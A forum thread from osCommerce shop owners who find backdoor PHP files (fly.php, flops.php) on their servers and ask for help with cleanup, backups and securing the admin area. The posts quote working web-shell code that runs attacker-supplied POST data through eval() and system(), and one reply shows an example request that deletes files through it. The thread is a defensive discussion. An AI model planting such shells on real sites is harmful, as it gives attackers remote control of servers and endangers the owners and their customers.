Fly.php?

[Whiskers]

Hey all,

 

I just went into FTP to do something and noticed a fly.php file in the root. I just doen a search, but am still not entirely sure what this is. This is what is inside it:

 

test<?php @eval($_POST

);?>

 

Thanks for any help.

[♥FWR Media]

Hey all,

 

I just went into FTP to do something and noticed a fly.php file in the root. I just doen a search, but am still not entirely sure what this is. This is what is inside it:

 

test<?php @eval($_POST

);?>

 

Thanks for any help.

 

It is a hack file.( albeit a badly coded one ) Your hosts should be able to trace from where it came.

[Whiskers]

It is a hack file.( albeit a badly coded one ) Your hosts should be able to trace from where it came.

 

That's weird. Is it that eval hack thing? It's weird as someone randomly PM'd me a few weeks ago saying that I should be careful of it (I had never spoken to them before), and suddenly I have it!?

 

What do I need to do to remove/prevent this?

 

Thanks.

[♥mdtaylorlrim]

That's weird. Is it that eval hack thing? It's weird as someone randomly PM'd me a few weeks ago saying that I should be careful of it (I had never spoken to them before), and suddenly I have it!?

 

What do I need to do to remove/prevent this?

 

Thanks.

The first thing you should do is remove your site from access to the internet. If they can put a file into your root directory they can put one anywhere deep inside your file structure to do whatever they want. You can Google fly.php or use the search here on the forum and likely find specifically what the eval hack is doing, but one of the most common results is sending spam email from your domain. Another is redirecting traffic away from your site. Even though someone clicked on your site they are directed elsewhere, or Google links get changed from your site to somewhere else.

 

If you get it off the internet you can prevent your host from being tagged as a spam email server.

 

Then the easiest way to recover is to wipe your site clean and reload all your files from a known good backup. Then apply all the security measures outlined in the security forum. Only then restore access to your site from the internet. Finding and removing the hack by hand will be cumberson because the eval hack alters files, not just adds files... you have to find every file that has been altered by the intruder.

 

All I can say is good luck.

[Guest]

That's weird. Is it that eval hack thing? It's weird as someone randomly PM'd me a few weeks ago saying that I should be careful of it (I had never spoken to them before), and suddenly I have it!?

 

What do I need to do to remove/prevent this?

 

Thanks.

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

[Whiskers]

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

I have just noticed that I have a flops.php file also? But I don;t see it on FTP, only on File Manager in cPanel.

[♥mdtaylorlrim]

I have just noticed that I have a flops.php file also? But I don;t see it on FTP, only on File Manager in cPanel.

IIRC any file preceded by a . will not show on most ftp programs therefore making that a favorite of hackers to use. Does the filename start with a period? .flops.php

[Whiskers]

IIRC any file preceded by a . will not show on most ftp programs therefore making that a favorite of hackers to use. Does the filename start with a period? .flops.php

 

Nope it doesn't start with a . I have deleted it as it have mention of eval in it. :(

[hellsey]

hm just saw that i've the flops.php too, deleted it :/

[Whiskers]

hm just saw that i've the flops.php too, deleted it :/

 

Safe best I guess. I am confident that the people who keep hacking are getting website names from here. As I only ever seem to get hack problems after I have posted up a website name I am working on. I should have learned by now! :(

[♥mdtaylorlrim]

I am confident that the people who keep hacking are getting website names from here. As I only ever seem to get hack problems after I have posted up a website name I am working on. I should have learned by now! :(

No, they are probably not. Every day I scan my logs, and every day I see attempts to gain access to common file that no longer exist in my shop because I have taken the necessary steps to secure my site, and I have never published the URL to my site or mentioned the name of the store.

 

I also have random attempts to access phpMyAdmin in any number of variations... phpmyadmin,PhpMyAdmin,PMA,pma,p.m.a,p/m/a, and the list goes on. I have all of those listed as Aliases to a common directory that has a ErrorPage 404 directive to a script that bans the IP address from the entire network. Works like a charm.. They get one attempt and then they are locked out and have to get a new IP to try again... it slows them down but nothing really stops them completely except keepng the server up to date and taking the appropriate software measures before they get to you.

 

 

<rant>

 

Most people make the mistake that deleting a single file they found has cured their site. If you found one, you can be assured there are others, and possibly individual lines of code in existing files have been altered. They fail to take down their own site and really clean it so they continue to send out spam or whatever to aid the hackers in their endeavors....

 

 

</rant>

[hellsey]

i know that deleting only one file wont protect me if smtg is already done, but i saw nothing strange about my website :/ no spam send , no bug (except some that i already have cuz of bad code skill :D) so... i think i'm nearly safe for now :/

[♥mdtaylorlrim]

i know that deleting only one file wont protect me if smtg is already done, but i saw nothing strange about my website :/ no spam send , no bug (except some that i already have cuz of bad code skill :D) so... i think i'm nearly safe for now :/

Do you use Site Monitor?

[Whiskers]

The problem with taking a site offline is that I have made weekly backups since the hack files were uploaded, so I would be just uploading the same files again, which is kind of pointless really. :(

[hellsey]

No i just discovered it :/ and i'm gonna install it as soon as possible ^^ (i'm new to oscommerce, my shop is running for 1 month only)

[♥mdtaylorlrim]

No i just discovered it :/ and i'm gonna install it as soon as possible ^^ (i'm new to oscommerce, my shop is running for 1 month only)

Ok, then it will not be much to wipe your site and install a fresh copy. Site monitor will not pick up additional files unless they are added AFTER it is installed and managed properly. The first time it runs it creates a list of files then on your site as a reference file. So, if rogue files are on your site now Site Monitor will not help you find them. It will however, discover certain lines of code in your files that are commonly used by hackers.

 

The point is, the damage has already been done, and you cannot be certain the extent of the damage with any tool available to you at this point. You are taking a chance that you are keeping a site alive that is damaging to your customers and your host. Even if you reload from new does not mean that you have to lose your database. It is likely NOT compromised at this point. It could be, but not likely.

[♥mdtaylorlrim]

The problem with taking a site offline is that I have made weekly backups since the hack files were uploaded, so I would be just uploading the same files again, which is kind of pointless really. :(

You don't keep multiple backups? I have a library of about 100 zip files containing backups. I can roll back the files and DB if necessary to a year ago and more...

[Whiskers]

You don't keep multiple backups? I have a library of about 100 zip files containing backups. I can roll back the files and DB if necessary to a year ago and more...

 

Erm, nope. Every week I delete the old one. :( Maybe I should start keeping them.

[♥mdtaylorlrim]

Erm, nope. Every week I delete the old one. :( Maybe I should start keeping them.

A lot of shops with non critical shops use the 7-1-12 rule for backups. Make a back up set daily. On Sunday, label the back as a weekly back and keep it. On the last of the month keep a backup labeled as a monthly back up.

 

So, you keep 6 daily backups, 3 weekly backups, 11 monthly backups, and a yearly backup.

 

You will always have the opportunity to roll back to any day this week. Any week in the past month, any month in the past year, and any prior year.

 

You need storage for 20+ sets of files/db.

[hellsey]

btw can someone tell us what's the flops.php really do ?

 

<?php ignore_user_abort(1);set_time_limit(0);if(isset($_POST['aisys'])){@system($_POST['aiflops']);}else{@eval($_POST['aiflops']);}?>

[♥mdtaylorlrim]

btw can someone tell us what's the flops.php really do ?

 

<?php ignore_user_abort(1);set_time_limit(0);if(isset($_POST['aisys'])){@system($_POST['aiflops']);}else{@eval($_POST['aiflops']);}?>

The eval command allows them to send any valid php command string to your sever.... like delete c:\*.*

 

So, they send a command like http://www.your_site.com/catalog/flops.php?delete%20*.*;

 

And your site is gone.... little things like that.

[hellsey]

ok cool stuff... ^^ (joke)

[wild.lucifero]

The eval command allows them to send any valid php command string to your sever.... like delete c:\*.*

 

So, they send a command like http://www.your_site.com/catalog/flops.php?delete%20*.*;

 

And your site is gone.... little things like that.

Hello to all,

I "resume" this thread because I would understand some things. I understand what fly.php can do, but I don't understand how it comes in the root of the website.

file_manager.php is protected by admin password, how is possible to run this program?

All people (and me) that seen this program on the website, are sure that ftp password isn'n known by nobody (it was known & used only by the owner), and many say that no ftp sessions was opened... So, how did it come in?

Can you help me to understand, please?

Really many thanks in advance.

Michele

[germ]

A programming vulnerability has been identified in files_manager.php and define_language.php that allows hackers to get past the admin login.

 

You should remove the aforementioned files ASAP and it would be a good idea to protect the admin with a .htaccess file, too.

[wild.lucifero]

A programming vulnerability has been identified in files_manager.php and define_language.php that allows hackers to get past the admin login.

You should remove the aforementioned files ASAP and it would be a good idea to protect the admin with a .htaccess file, too.

Thank you for your reply, really many thanks.

Do you know if there is a vulnerability to get the SQL password too? (assuming that file_manager.php and define_language.php are been removed; the admin directory is password protected too)

The SQL password is stored in catalog\includes\configure.php not only in the catalog\admin\includes\configure.php.

Thanks again

Michele